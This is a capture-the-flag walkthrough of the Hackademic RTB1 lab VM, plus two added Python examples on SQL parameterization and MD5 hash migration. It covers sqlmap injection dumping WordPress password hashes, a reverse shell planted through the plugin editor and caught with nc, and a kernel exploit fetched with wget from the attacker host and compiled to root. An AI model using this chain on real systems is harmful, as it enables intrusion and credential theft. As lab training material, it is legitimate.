HACKADEMIC: RTB1
https://www.vulnhub.com/entry/hackademic-rtb1,17/
Host discovery
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:15:01]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.8
Host is up (0.00057s latency).
nmap scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:15 CST
Nmap scan report for 192.168.54.8
Host is up (0.00093s latency).
Not shown: 65515 filtered tcp ports (no-response), 18 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:26] C:1
$ sudo nmap -sT -sV -O -p22,80 192.168.54.8
[sudo] yunki 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:16 CST
Nmap scan report for 192.168.54.8
Host is up (0.00050s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.22 - 2.6.36
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:40]
$ sudo nmap -sU -p22,80 192.168.54.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:16 CST
Nmap scan report for 192.168.54.8
Host is up (0.00050s latency).
PORT STATE SERVICE
22/udp filtered ssh
80/udp filtered http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:55]
$ sudo nmap --script=vuln -p22,80 192.168.54.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 15:17 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.8
Host is up (0.00059s latency).
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: BID:49303 CVE:CVE-2011-3192
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.securityfocus.com/bid/49303
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://seclists.org/fulldisclosure/2011/Aug/175
|_ https://www.tenable.com/plugins/nessus/55976
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:01:8A:4D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 170.89 seconds
Web penetration
Directory scan
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:16:08]
$ dirb http://192.168.54.8/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 15 15:19:13 2023
URL_BASE: http://192.168.54.8/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.8/ ----
+ http://192.168.54.8/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.54.8/index.html (CODE:200|SIZE:1475)
+ http://192.168.54.8/phpmyadmin (CODE:403|SIZE:290)
+ http://192.168.54.8/phpMyAdmin (CODE:403|SIZE:290)
-----------------
END_TIME: Wed Mar 15 15:19:24 2023
DOWNLOADED: 4612 - FOUND: 4
The page tells us the target is http://192.168.54.8/Hackademic_RTB1/
Run dirb against that directory.
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:41:06]
$ dirb http://192.168.54.8/Hackademic_RTB1/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Mar 15 15:41:20 2023
URL_BASE: http://192.168.54.8/Hackademic_RTB1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.8/Hackademic_RTB1/ ----
+ http://192.168.54.8/Hackademic_RTB1/index.php (CODE:500|SIZE:1881)
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-admin/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-content/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-images/
==> DIRECTORY: http://192.168.54.8/Hackademic_RTB1/wp-includes/
+ http://192.168.54.8/Hackademic_RTB1/xmlrpc.php (CODE:200|SIZE:42)
---- Entering directory: http://192.168.54.8/Hackademic_RTB1/wp-admin/ ----
+ http://192.168.54.8/Hackademic_RTB1/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.54.8/Hackademic_RTB1/wp-admin/index.php (CODE:302|SIZE:0)
-----------------
END_TIME: Wed Mar 15 15:41:44 2023
DOWNLOADED: 9224 - FOUND: 4
Browsing the site, we find that 192.168.54.8/Hackademic_RTB1/?cat=1
is vulnerable to SQL injection, so we run sqlmap against it directly.
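The injectable ?cat= parameter is the classic case of a request value pasted straight into SQL text. The Python block below is an added example, not code from the original post or from WordPress: it models that pattern against an in-memory SQLite table (the table name, columns and rows are constructed for illustration) and puts the hardened form beside it, where the value is type-checked and then bound as a query parameter so the database never parses attacker-controlled text as SQL.

```python
import sqlite3

# Constructed sample rows standing in for the wp_categories table that the
# walkthrough's sqlmap run enumerated; names and ids are illustrative only.
SAMPLE_ROWS = [(1, "Uncategorized"), (2, "News"), (3, "Private")]


def make_db():
    """Build an in-memory database with a small wp_categories lookalike."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_categories (cat_ID INTEGER, cat_name TEXT)")
    conn.executemany("INSERT INTO wp_categories VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def category_vulnerable(conn, cat):
    """String concatenation: whatever arrives in ?cat= becomes part of the
    SQL statement. This is the defect the walkthrough's sqlmap run exploits."""
    sql = "SELECT cat_ID, cat_name FROM wp_categories WHERE cat_ID = " + cat
    return conn.execute(sql).fetchall()


def category_hardened(conn, cat):
    """Validate the expected type first, then bind the value as a parameter.
    A non-numeric value is rejected before any SQL is built."""
    if not cat.isdigit():
        raise ValueError("cat must be a positive integer")
    sql = "SELECT cat_ID, cat_name FROM wp_categories WHERE cat_ID = ?"
    return conn.execute(sql, (int(cat),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(category_vulnerable(db, "1"))         # one row, as intended
    print(category_vulnerable(db, "1 OR 1=1"))  # tautology: every row leaks
    print(category_hardened(db, "1"))           # one row
    try:
        category_hardened(db, "1 OR 1=1")
    except ValueError as err:
        print("rejected:", err)
```

The type check alone would stop this particular payload, but the parameter binding is the part that holds up when the column is a string and no whitelist of shapes exists; use both.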
sqlmap
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:52:55]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" --current-db --batch
current database: 'wordpress'
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:52:58]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch
Database: wordpress
[9 tables]
+-------------------+
| wp_categories |
| wp_comments |
| wp_linkcategories |
| wp_links |
| wp_options |
| wp_post2cat |
| wp_postmeta |
| wp_posts |
| wp_users |
+-------------------+
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:53:01]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [15:53:14]
$ sqlmap -u "192.168.54.8/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_nickname,user_pass,user_level --dump --batch
Database: wordpress
Table: wp_users
[6 entries]
+---------------+---------------------------------------------+------------+
| user_nickname | user_pass | user_level |
+---------------+---------------------------------------------+------------+
| NickJames | 21232f297a57a5a743894a0e4a801fc3 (admin) | 1 |
| MaxBucky | 50484c19f1afdaf3841a0d821ed393d2 (kernel) | 0 |
| GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3) | 10 |
| JasonKonnors | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell) | 0 |
| TonyBlack | a6e514f9486b83cb53d8d932f9a04292 (napoleon) | 0 |
| JohnSmith | b986448f0bb9e5e124ca91d3d650f52c | 0 |
+---------------+---------------------------------------------+------------+
Here, going by the column contents, I picked out the more important fields: username, password and level. GeorgeMiller has the highest level, so let's try logging in to the wp backend as that user. Visiting http://192.168.54.8/Hackademic_RTB1/wp-admin/
redirects straight to the login page.
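The user_pass column in the dump holds 32-character hex strings, i.e. unsalted MD5, which is why sqlmap could print the plaintext beside most of them straight away. The Python block below is an added example (not from the original post or from WordPress) showing the check and the fix a defender would want: flag stored credentials that have the bare-MD5 shape, and migrate each one to a salted, iterated PBKDF2 record on the user's next successful login. The alg$iterations$salt$digest storage format and the 200,000-iteration work factor are assumptions made for this example; the sample user table is constructed from two entries of the dump.

```python
import hashlib
import hmac
import os
import re

# Constructed sample modelled on the user_nickname/user_pass dump:
# 32 lowercase hex characters, i.e. an unsalted MD5 of the password.
SAMPLE_USERS = {
    "NickJames": "21232f297a57a5a743894a0e4a801fc3",
    "JohnSmith": "b986448f0bb9e5e124ca91d3d650f52c",
}

UNSALTED_MD5 = re.compile(r"^[0-9a-f]{32}$")
PBKDF2_ITERATIONS = 200_000  # assumed work factor for this example


def is_unsalted_md5(stored):
    """True when a stored credential has the shape of a bare MD5 digest."""
    return bool(UNSALTED_MD5.match(stored))


def md5_hex(password):
    """Legacy scheme: unsalted and fast, so equal passwords give equal hashes."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_hash(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Salted, iterated hash serialised as alg$iterations$salt$digest
    (a format chosen for this example, not a WordPress one)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_pbkdf2(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _alg, iterations, salt_hex, digest_hex = stored.split("$")
    recomputed = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(recomputed.hex(), digest_hex)


def accounts_needing_rehash(users):
    """Audit a user table and list the accounts still on the legacy scheme."""
    return sorted(name for name, h in users.items() if is_unsalted_md5(h))


def upgrade_on_login(stored, password):
    """Transparent migration: when a legacy hash matches the password the user
    just presented, return the replacement PBKDF2 record; otherwise None."""
    if is_unsalted_md5(stored) and hmac.compare_digest(md5_hex(password), stored):
        return pbkdf2_hash(password)
    return None


if __name__ == "__main__":
    print("legacy accounts:", accounts_needing_rehash(SAMPLE_USERS))
    # Two users with the same password: identical under MD5, distinct under PBKDF2.
    print(md5_hex("admin") == md5_hex("admin"), pbkdf2_hash("admin") != pbkdf2_hash("admin"))
    new_record = upgrade_on_login(SAMPLE_USERS["NickJames"], "admin")
    print("migrated:", new_record is not None and verify_pbkdf2("admin", new_record))
```

The migrate-on-login pattern is what lets a site retire the old column without ever knowing the plaintexts in bulk; accounts that never log in again stay on the audit list and can be forced through a reset.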
Browsing around the backend, I found that PHP files can be edited here, so let's try writing a reverse shell.
Start a port listener, then visit http://192.168.54.8/Hackademic_RTB1/wp-content/plugins/hello.php
# yunki @ yunki in ~ [16:02:39]
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.8] 47172
bash: no job control in this shell
bash-4.0$ whoami
whoami
apache
Privilege escalation
bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
bash-4.0$ uname -r
uname -r
2.6.31.5-127.fc12.i686
On Kali
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:34:32]
$ searchsploit 2.6.3 | grep "Privilege Escalation"
Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) | linux/local/44677.rb
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Local Privilege Escalation (3) | linux/local/9844.py
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Local Privilege Escalation (Metasploit) | linux/local/19933.rb
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Local Privilege Escalation (1) | linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Local Privilege Escalation | linux/local/40812.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation | linux_x86-64/local/15024.c
Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation | linux/local/9191.txt
Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation | linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local Privilege Escalation (4) | linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation | linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation | linux/local/15704.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation (1) | linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2) | linux/local/35161.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Local Privilege Escalation (1) | linux_x86/local/15916.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Local Privilege Escalation (2) | linux/local/15944.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation | linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation | linux_x86-64/local/15023.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation | linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation | linux/local/15774.c
ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9.10) - 'xattr' Local Privilege Escalation | linux/local/12130.py
(So many. I tried a lot of them and none worked; in the end the Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation one succeeded TAT)
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:36:03]
$ searchsploit -m 15285.c
  Exploit: Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/15285
     Path: /usr/share/exploitdb/exploits/linux/local/15285.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/yunki/vulnhub/HackademicRTB1/15285.c
# yunki @ yunki in ~/vulnhub/HackademicRTB1 [16:36:09]
$ php -S 0:80
[Wed Mar 15 16:36:16 2023] PHP 7.4.15 Development Server (http://0:80) started
On the target
bash-4.0$ wget http://192.168.54.128/15285.c
wget http://192.168.54.128/15285.c
--2023-03-15 01:59:35-- http://192.168.54.128/15285.c
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/x-c]
Saving to: `15285.c.1'
0K ...... 100% 618M=0s
2023-03-15 01:59:35 (618 MB/s) - `15285.c.1' saved [7155/7155]
bash-4.0$ gcc 15285.c -o 15285
gcc 15285.c -o 15285
bash-4.0$ chmod +x 15285
chmod +x 15285
bash-4.0$ ./15285
./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:01:8a:4d brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.8/24 brd 192.168.54.255 scope global eth0
    inet6 fe80::20c:29ff:fe01:8a4d/64 scope link
       valid_lft forever preferred_lft forever